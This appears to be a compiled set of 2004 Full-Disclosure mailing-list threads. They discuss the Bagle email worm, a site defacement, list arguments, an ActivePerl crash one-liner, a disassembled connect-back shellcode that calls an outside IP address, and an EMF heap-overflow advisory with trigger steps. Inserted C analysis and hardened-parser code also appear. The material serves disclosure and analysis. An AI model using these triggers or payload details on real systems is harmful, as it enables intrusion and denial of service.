F-Secure is reporting it as Bagle.AL. Looks like it's your basic email virus with a trojan backdoor.

http://www.f-secure.com/v-descs/bagle_al.shtml

Dave King, http://www.thesecure.net

Jonathan Grotegut wrote:

> (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
>
> Jonathan Grotegut
RE: [Full-Disclosure] (no subject)
Todd,

Thanks for the reply; it appears to be a new Beagle variant.

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_BAGLE.AC

Jonathan Grotegut

-----Original Message----- From: Todd Towles [mailto:[EMAIL PROTECTED] Sent: Monday, August 09, 2004 1:32 PM To: Jonathan Grotegut; 'Full-disclosure' Subject: RE: [Full-Disclosure] (no subject)

> I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.
>
> -----Original Message----- From: [EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject)
>
> > (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
> >
> > Jonathan Grotegut
Re: [Full-Disclosure] (no subject)
This Symantec Rapid Release beta will catch it for NAV users, until they roll out the next official .def file:
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/beta/symcbetadefsx86.exe

On Mon, 9 Aug 2004 14:32:14 -0500, Todd Towles [EMAIL PROTECTED] wrote:
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 2:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut

--
-Micheal
Re: [Full-Disclosure] (no subject)
ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today.

From ClamAV Update list:
Submission: 5025-web, 5026-web, 5027-web, 5028-web, 5029-web, 5030-web, 5043-web, 5044-web, 5045-web, 5046-web, 5047-web, 5048-web
Sender: James Stevens, Bill Landry, Henning Spjelkavik, Melanie Dussiaume, Roman Scheucher, Gunter Mintzel, Mike Watterson, Martin, Rob Kudyba, wojciech myszka, Philip Corliss, Kevin Way
Virus: unknown, JS/IllWill (McAfee), JS.Dword.dropper (Bitdefender), JScript/IE.VM.Exploit (Inoculate)
Alias: TR/RunMe.Dldr.1 (Hbedv)
Added: Trojan.JS.RunMe
Added: Trojan.RunMe
Note: The name may change.
Note: There are more submissions with this; at the moment I'm publishing just some of them.

-Mike

Jonathan Grotegut wrote:
(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
I doubt many are infected on the list. Spoofed addresses culled from either the list itself, or via Google searches, seem to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a Solaris server, and I'm doing e-mails here via pine, so those were spoofed.

Thanks,

Ron DuFresne

On Mon, 9 Aug 2004, Todd Towles wrote:
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 2:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut

~~
Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
RE: [Full-Disclosure] (no subject)
I started seeing this earlier. No news from Norton that I can see. I'm trying to figure out what it does...

Shannon Johnston

On Mon, 2004-08-09 at 13:03, Jonathan Grotegut wrote:
(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut

--
Shannon Johnston
[EMAIL PROTECTED]
Cavion Plus
Re: [Full-Disclosure] (no subject)
List of URLs embedded within a price.exe I received. -M.
RE: [Full-Disclosure] (no subject)
It appears to be what TrendMicro calls Beagle.AC - IDE released at 2:30pm. Maybe it is dropping an older Trojan.

-Original Message-
From: Paul Szabo [mailto:[EMAIL PROTECTED]
Sent: Monday, August 09, 2004 3:06 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] (no subject)

Anyone have any idea what this is ...

F-PROT ANTIVIRUS
Program version: 4.4.2
Engine version: 3.14.11

VIRUS SIGNATURE FILES
SIGN.DEF created 9 August 2004
SIGN2.DEF created 9 August 2004
MACRO.DEF created 10 May 2004

message-new__price.zip-price.html  Infection: HTML/[EMAIL PROTECTED]
message-new__price.zip-price/price.exe is a dropper for W32/Mitglieder.W

Cheers,

Paul Szabo - [EMAIL PROTECTED]  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney  2006  Australia
Re: [Full-Disclosure] (no subject)
Symantec identifies this as [EMAIL PROTECTED]

-Bob Kehr

Jonathan Grotegut wrote:
(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut
RE: [Full-Disclosure] (no subject)
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Michael
Sent: Monday, August 09, 2004 3:25 PM
To: Jonathan Grotegut
Cc: Full-disclosure
Subject: Re: [Full-Disclosure] (no subject)

List of URLs embedded within a price.exe I received. -M.

snip

All of this is located on the SANS Internet Storm Center site. Bernard linked to it in his response.
http://www.incidents.org
RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...
Well, that is what I meant. People that have people from FD are infected. Sorry, typed that up fast when I was working on something else.

-Original Message-
From: Ron DuFresne [mailto:[EMAIL PROTECTED]
Sent: Monday, August 09, 2004 3:40 PM
To: Todd Towles
Cc: 'Jonathan Grotegut'; 'Full-disclosure'
Subject: RE: [Full-Disclosure] (no subject) spoofed addresses still confuse many...

I doubt many are infected on the list. Spoofed addresses culled from either the list itself, or via Google searches, seem to apply here. I've seen at least 4-5 of these yuuckies purporting to come from me and this server here, but, note, it is a Solaris server, and I'm doing e-mails here via pine, so those were spoofed.

Thanks,

Ron DuFresne

On Mon, 9 Aug 2004, Todd Towles wrote:
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB). There appear to be some people on FD that are infected and we are getting a lot on my end.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 2:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut

~~
Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
Re: [Full-Disclosure] (no subject)
On Mon, 09 Aug 2004 16:07:02 -0400 Michael Erdely [EMAIL PROTECTED] wrote:
ClamAV calls it Trojan.JS.Runme. My update for it came at 3 PM EDT today.
..
-Mike

ClamAV has problems filtering the HTML e-mails. I received about 4 infected mails even though clamscan/clamd know the virii. ClamScan identifies the virii without problems if I scan the attachment saved on the HDD...

vh
Re: [Full-Disclosure] (no subject)
On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote:
BitDefender 7.0/20040809 found [JS.Dword.dropper]
ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe]
eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit]
F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED]
Kaspersky 4.0.2.23/20040809 found nothing
McAfee 4383/20040804 found [JS/IllWill]
NOD32v2 1.836/20040809 found [Win32/Bagle.AI]
Norman 5.70.10/20040806 found [W32/Malware]
Panda 7.02.00/20040809 found [Fichero Sospechoso]
Sybari 7.5.1314/20040809 found [JS/IllWill]
Symantec 8.0/20040809 found nothing
TrendMicro 7.000/20040809 found [HTML_BAGLE.AC]

Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particularly medicine... Makes for a nice game of AV bingo though...

-Frank
RE: [Full-Disclosure] (no subject)
F-Secure is saying that this is a new variant of Bagel.
http://www.f-secure.com/weblog/

Michael Poulin

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 3:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut

DISCLAIMER: The information in this electronic mail message is sender's business Confidential and may be legally privileged. It is intended solely for the addressee(s). Access to this Internet electronic mail message by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. The sender believes that this E-mail and any attachments were free of any virus, worm, Trojan horse, and/or malicious code when sent. This message and its attachments could have been infected during transmission. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective and remedial action about viruses and other defects. MASCO is not liable for any loss or damage arising in any way from this message or its attachments.
RE: [Full-Disclosure] (no subject)
Provid
25272 | 80.92.97.12     | SINSTELECOM-AS Autonomous Syst
25308 | 212.118.44.66   | CITYLAN-AS CityLanCom, ISP, Mo
26085 | 66.163.161.45   | YAOO Yahoo!
26201 | 208.185.127.160 | ABOUTC-1 About.com
26914 | 216.195.34.121  | GLOBA-10 Global Netoptex, Inc
29076 | 195.128.50.163  | HOSTER-RU-AS Hoster.RU autonom
29182 | 82.146.33.247   | ISPSYSTEM-AS ISPsystem Autonom
29314 | 82.139.8.2      | DAMINET-AS Telewizja Kablowa D
29339 | 195.137.212.24  | MBBG-AS Markus Bach Betriebs G
30968 | 195.208.235.68  | INFOBOX-AS Net of Alkor Ltd, h

johannes ullrich, jullrich ..at.. sans.org

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut
Sent: Monday, August 09, 2004 2:04 PM
To: Full-disclosure
Subject: RE: [Full-Disclosure] (no subject)

(In regards to new_price.zip file attachment)
Anyone have any idea what this is? We had some clients just get hit pretty hard with this email. I am unable to find anything on it; from my VERY limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet?
Jonathan Grotegut
Re: [Full-Disclosure] (no subject)
It doesn't seem to me that Adam said or did anything in asking his question that should provoke such rude and condescending responses. It was, after all, a pretty simple question. I think unless you have something constructive to say you ought to just ignore a post instead of acting like you've somehow been offended.

Just my .02

Glenn

On Mon, 26 Jul 2004 15:22:47 -0700 (PDT), Will Image [EMAIL PROTECTED] wrote:
stop crying and learn how to patch your shit. why email a whole list over some bullshit, you're just making yourself look incompetent.

--- VX Dude [EMAIL PROTECTED] wrote:
If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters.

-redX

--- [EMAIL PROTECTED] wrote:
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

-
This mail sent through IMP: http://horde.org/imp/
Re: [Full-Disclosure] (no subject)
[EMAIL PROTECTED] wrote:
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

-
This mail sent through IMP: http://horde.org/imp/

Who gives a shit? Go search for him on Zone-H.org.
Re: [Full-Disclosure] (no subject)
stop crying and learn how to patch your shit. why email a whole list over some bullshit, you're just making yourself look incompetent.

--- VX Dude [EMAIL PROTECTED] wrote:
If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters.

-redX

--- [EMAIL PROTECTED] wrote:
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

-
This mail sent through IMP: http://horde.org/imp/
[Full-Disclosure] (no subject)
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

-
This mail sent through IMP: http://horde.org/imp/
Re: [Full-Disclosure] (no subject)
On Sun, 25 Jul 2004 [EMAIL PROTECTED] wrote:
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

You'll likely have better luck on the incidents mailing list at securityfocus.

--
Yours,
J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

...justice is a duty towards those whom you love and those whom you do not. And people's rights will not be harmed if the opponent speaks out about them. -- Osama Bin Laden
- - -
There ought to be limits to freedom! -- George Bush
- - -
Which one scares you more?
Re: [Full-Disclosure] (no subject)
If I may inquire, why would you care about such a nobody? Are you insulted that a real hacker didn't find your site worthy? It's just a website, why are you whining? The more you guys whine, the more they think what they do matters.

-redX

--- [EMAIL PROTECTED] wrote:
Hello all, I just had a site cracked by some script-kiddy going by RedX. The little squirt was just being pesky by cracking the passwd for a simple store admin and plastering "Hacked by redX" in the php forms, not a real hack. And he uploaded a file with some stupid logo he made with MS Paint, what a waste of time; there was no real hack involved and no access to any important info. Just wondering if anybody else has encountered this nobody?

Adam

-
This mail sent through IMP: http://horde.org/imp/
[Full-Disclosure] (no subject)
If it was blatantly evident that the post was a hoax, why is mi2g crying like a six year old with a skinned knee?

Nice imagery. I think you're being unfair. My 6yr old daughter hasn't whined like mi2g since she was a wee baby, skinned knee or no.
[Full-Disclosure] (no subject)
- The very same people are finding these big bugs. It is not like there are a whole ton of inexperienced people finding these bugs. These are the best. They are experts at finding them. They may not always be cognizant of this themselves, the act of finding them may not seem difficult to them, but it is -- and this is clearly shown by the fact that the same people keep finding these bugs.

I contend that the fact that the very same people are reporting bugs does not mean that they are the only ones finding them. Nor does it mean that only an expert might find them. Nor does it mean that all experts would be inclined to report them.

Using any operating system that is 1) not obsessed with backward compatibility to the point that old vulnerabilities are retained forever, and 2) does not force users and servers alike to run unnecessary applications, and 3) is deployed by a company that manages its software development lifecycle in a manner that ensures all the various programmers are applying security patches to all the various versions under development, would be a big improvement. Microsoft might someday become such a company, XP SP2 being a start. And then you could look at how IE handles security zones... Whether the new search tool will be another built-in...

Robin
[Full-Disclosure] (no subject)
Similarly - what's to keep someone from using their digital out from their home audio equipment to send the bits to their digital in on their computer?

The problem is that many users of this list are so stupid, they would rather complain endlessly about copy protection than do exactly what you describe. The only possible conclusion one can draw is that the people who have written about how great a travesty copy-protection is are the only ones wholly unable to circumvent it. They are also the ones least likely to ever comment on security related topics, which is exactly what this list is for.
[Full-Disclosure] (no subject)
AMEN!!! Preach it, brother!

Best regards,

Bill Cerynik
Managing Partner
VC Consulting LLC
973.616.8170
[EMAIL PROTECTED]
http://www.vcconsulting.biz
Bringing open source solutions to the real world

Message: 12
Date: Tue, 15 Jun 2004 14:52:11 -0400
From: Len Rose [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Administrivia: Classical Rant

ATTENTION LAMERS

Speaking for myself only, something has to be done about the quality of the information, and the standards of netiquette on this list. We all don't need to see mindless banter, and other noise spewing back and forth. If you can, please try to not post this spewage to the list, but instead send mail to each other (after carefully cutting and pasting on your windows desktop). If you must send it to the list it must be in terms of technical content, whether it is of a real security issue and not if Yahoo will increase your disk space or what slashdorks posted about something that was known since 2 months ago. I use the word technical loosely as in my mind, anything security related is inherently technical even if it is not actually dealing with code or networks or systems. I'm very sick of seeing the amount of lame crap on this list, and I imagine a great deal of others are too.

Thanks for listening.

PS Unlike other reputable lists, we try not to censor anyone if they at least subscribe and never hit the queue. Lately we default to delete and try to approve those people who insist on posting without subscribing, or posting from a non-subscribed address. If reputable means bugtraq or cert then beat me with a stick.
[Full-Disclosure] (no subject)
Oliver,

Quickly testing the below string at the command line does crash perl.exe. I have ActivePerl 5.8.0 Build 805 installed on a Windows 2000 machine.

perl -e "$a="A" x 256; system($a)"

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Monday, May 17, 2004 4:24 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Buffer Overflow in ActivePerl ?

hi folks,

i played around with ActiveState's ActivePerl for Win32, and crashed Perl.exe with the following command:

perl -e "$a="A" x 256; system($a)"

I wonder if this bug isn't known?!? Because system() is a very common command. Can anybody reproduce this?

I put together a little advisory on my website, including version information and a debugger output (Drwatson):
http://www.oliverkarow.de/research/ActivePerlSystemBOF.txt

PS: Due to travel activity, i will not be able to respond to mails within the next 8 days!

Regards,
Oliver
[Full-Disclosure] (no subject)
In the last few days I saw there was an advisory relating to Sphiro by slotto. Well, we never released Sphiro. It never was on our official website http://www.rosiello.org. It's definitely under development and not public yet, so the advisory is just a stupid way to offend us, realized by slotto (I don't even know him). He made an advisory about software not released to show how skilled he is (he must be really cool...). This is a stupid joke by some stupid guy!

best regards,
Rosiello Security
[Full-Disclosure] (no subject)
Dinesh Kumar
Windows Team | IT Infrastructure
+91-0124-282 6301
[EMAIL PROTECTED]
[Full-Disclosure] (no subject)
unsubscribe
mails without subject (was: [Full-Disclosure] (no subject))
Hello Jim,

* Jim Burnes [EMAIL PROTECTED] [2004-03-19 14:51]:
> Actually, what is really needed and primarily missing from the security picture is:

a mail with a subject.

regards
nico
--
Nico Golde | [EMAIL PROTECTED] | [EMAIL PROTECTED] | [EMAIL PROTECTED]
http://www.ngolde.de | GnuPG Key: http://www.ngolde.de/gpg/nico_golde.gpg
Fingerprint | FF46 E565 5CC1 E2E5 3F69 C739 1D87 E549 7364 7CFF
echo [q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq|dc
[Full-Disclosure] (no subject)
We grabbed the binary data from the sniff'ed below. After a quick reverse, it turns out to be a connect-back shellcode with back server p- 24.19.147.225.

Partially disassembled:

0084 68 18 13 93 E1    push    0E1931318h
0089 68 02 00 22 E4    push    0E4220002h
008E 8B CC             mov     ecx, esp
0090 6A 10             push    10h
0092 51                push    ecx
0093 FF 76 24          push    dword ptr [esi+24h]
0096 FF D0             call    eax

======================================================================
The following info was automatically generated by OSAnalyzer program.
======================================================================

call eax=776ba5a3
776ba5a3 = WS2_32.dll!connect with para 3
Para 0 is socket # 0094
Para 1 is name p- 00dafcc4
Para 2 is namelen 0010
sin_family AF_INET , port 8932 IP 24.19.147.225
call external 776ba5a3 stack 000c return ;

=== a quick translation ===

C:\TEMP>ping -a 24.19.147.225
Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data

Hope the info is useful to you.

Regards
Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/

Date: Wed, 25 Feb 2004 08:46:26 -0800
From: John Sage [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Probes on port 389

Just picked this up:

On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> From: Schmehl, Paul L [EMAIL PROTECTED]
> To: [EMAIL PROTECTED], [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Probes on port 389
> Date: Tue, 24 Feb 2004 11:06:50 -0600
>
> I threw up a quick rule on snort to monitor probes on port 389 because I have been seeing entries in /var/log/messages on some boxes that I am responsible for. This morning we had a probe that hit 26205 different IPs on that port in about 7 minutes (SYN scan only - no payload.) The source IP was a mailserver in England. (They've been notified.)
/* snip */
input: snort.log.1077660886
filter: ip and ( src host 24.6.176.211 )
# T 2004/02/25 08:08:15.042588 24.6.176.211:220 - 24.19.147.xxx:389 [S]
# T 2004/02/25 08:08:15.092297 24.6.176.211:220 - 24.19.147.xxx:389 [R]
# T 2004/02/25 08:08:15.097128 24.6.176.211:2211 - 24.19.147.xxx:389 [S]
# T 2004/02/25 08:08:15.146174 24.6.176.211:2211 - 24.19.147.xxx:389 [A]
# T 2004/02/25 08:08:15.154158 24.6.176.211:2211 - 24.19.147.xxx:389 [A]
[hex dump of the captured payload omitted]
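To confirm the decoding of the connect-back target from the two pushed immediates, here is an added example (my code, not Peter Huang's or OSAnalyzer's output) that lays the dwords out as the x86 stack would and reads back the Winsock sockaddr_in; the two constants are copied from the disassembly above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Immediates from the disassembly. The second push lands at the lower
   address, so after "mov ecx, esp" ecx points at IMM_FAMILY_PORT and
   IMM_ADDR follows it 4 bytes later. */
#define IMM_ADDR        0xE1931318u   /* push 0E1931318h (first push) */
#define IMM_FAMILY_PORT 0xE4220002u   /* push 0E4220002h (second push) */

struct connect_target {
    unsigned family;   /* 2 = AF_INET */
    unsigned port;     /* host byte order */
    char ip[16];       /* dotted quad */
};

/* x86 stores each pushed dword low byte first, so the 8 bytes at esp are
   02 00 22 E4 18 13 93 E1: sin_family (host order), sin_port (network
   order), sin_addr (network order). Returns 0 on success, -1 if the
   family is not AF_INET. */
int decode_sockaddr_pushes(uint32_t family_port, uint32_t addr,
                           struct connect_target *out)
{
    unsigned char raw[8];
    for (int i = 0; i < 4; i++) {
        raw[i]     = (unsigned char)(family_port >> (8 * i));
        raw[4 + i] = (unsigned char)(addr >> (8 * i));
    }
    out->family = raw[0] | (raw[1] << 8);     /* little-endian host order */
    out->port   = (raw[2] << 8) | raw[3];     /* big-endian network order */
    snprintf(out->ip, sizeof out->ip, "%u.%u.%u.%u",
             raw[4], raw[5], raw[6], raw[7]);
    return out->family == 2 ? 0 : -1;
}

int main(void)
{
    struct connect_target t;
    if (decode_sockaddr_pushes(IMM_FAMILY_PORT, IMM_ADDR, &t) == 0)
        printf("AF_INET %s:%u\n", t.ip, t.port);   /* AF_INET 24.19.147.225:8932 */
    return 0;
}
```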
[Full-Disclosure] (no subject)
We checked both EMF and WMF files out and changed around the sizes and it did not crash Windows XP (SP1, EN). From the posts on the full disclosure, it seems what you reported might be caused by other factors. Or is it exploitable on older versions of XP?

Here is a list of modules loaded. XP tested (not crashing): Build 2600 xpsp1.020828-1920; SP1

92 Module: 5cb0: C:\WINDOWS\System32\shimgvw.dll for C:\WINDOWS\EXPLORER.EXE
93 Module: 5cb0: C:\WINDOWS\System32\shimgvw.dll for C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE

Peter Huang
OSsurance, Protection Against Win32 Viruses and BOF Worms
http://www.ossecurity.ca/

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Friday, February 20, 2004 1:46 PM
To: [EMAIL PROTECTED]
Subject: Windows XP explorer.exe heap overflow.

Vulnerability in XP explorer.exe image loading
--
Systems affected: Current XP - others not tested.
Degree: Arbitrary code execution.

Summary
---
A malformed .emf (Enhanced Metafile, a graphics format) file can cause an exploitable heap overflow in (or near) shimgvw.dll.

Details
---
The image preview code that explorer uses has an exploitable buffer overflow. An .emf file with a total size field set to less than the header size will cause explorer.exe to crash in the heap routines - in classic heap overflow style that should be exploitable a la the RPC exploits.

There are two overflows here:

1. A buffer is allocated with the size indicated in the header (no validity checks), then the header is copied into it - if the size is less than the header size, that's one overflow.

2. They then proceed to read the rest of the file to a length of (size-headersize), which allows for an integer overflow causing the rest of the file to be appended to the already blown buffer.

Exploit
---
To exploit this flaw (in explorer), simply place a malformed (invalid size field) .emf file in any directory, open explorer to that path, and view as Thumbnails. Bang.

In its simplest form it's a DOS - it affects all explorer windows, including File Open dialogs for many programs. Alternatively, without viewing as a Thumbnail, open the picture preview window for the .emf file. (It's the default double-click action). Using this trigger causes a different crash point, which may not be exploitable, but I wouldn't rule it out.

Additional notes

It may be worth checking out similar issues in .wmf files, as they are similar.

- Jellytop, 2004

If a man will begin with certainties, he shall end in doubts; but if he will be content to begin with doubts he shall end in certainties.
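The validity check the advisory says is missing, written as an added illustration of a hardened loader (my code, not shimgvw.dll's): the 88-byte header length and the size field at offset 48 are assumptions modelled on ENHMETAHEADER, and the sample files are constructed.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout (modelled on ENHMETAHEADER, not taken from the post): the
   loader copies HDR_SIZE header bytes, and the "total size" field sits at
   SIZE_OFF as a little-endian uint32. */
#define HDR_SIZE 88u
#define SIZE_OFF 48u

enum load_status { LOAD_OK, LOAD_TRUNCATED, LOAD_BAD_SIZE, LOAD_NOMEM };

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The advisory's vulnerable sequence is: buf = alloc(total); copy HDR_SIZE
   bytes in; read (total - HDR_SIZE) more. With total < HDR_SIZE the first
   copy overruns buf (overflow 1) and the unsigned subtraction wraps, so the
   rest of the file is appended to the already overflowed buffer (overflow 2).
   This loader checks the field against both the header length and the bytes
   actually supplied before allocating anything. On LOAD_OK, *out holds a
   malloc'd copy of exactly total bytes that the caller must free. */
enum load_status load_metafile(const uint8_t *file, size_t len, uint8_t **out)
{
    if (len < HDR_SIZE) return LOAD_TRUNCATED;       /* header itself missing */
    uint32_t total = rd32le(file + SIZE_OFF);
    if (total < HDR_SIZE) return LOAD_BAD_SIZE;      /* stops overflow 1 */
    if (total > len) return LOAD_TRUNCATED;          /* bounds the body read */
    size_t body = total - HDR_SIZE;                  /* cannot wrap now (2) */
    uint8_t *buf = malloc(total);
    if (!buf) return LOAD_NOMEM;
    memcpy(buf, file, HDR_SIZE);
    memcpy(buf + HDR_SIZE, file + HDR_SIZE, body);
    *out = buf;
    return LOAD_OK;
}

/* Constructed sample: len zero bytes with the size field set to claimed
   (len must be at least SIZE_OFF + 4). */
void make_sample(uint8_t *dst, size_t len, uint32_t claimed)
{
    memset(dst, 0, len);
    for (int i = 0; i < 4; i++)
        dst[SIZE_OFF + i] = (uint8_t)(claimed >> (8 * i));
}
```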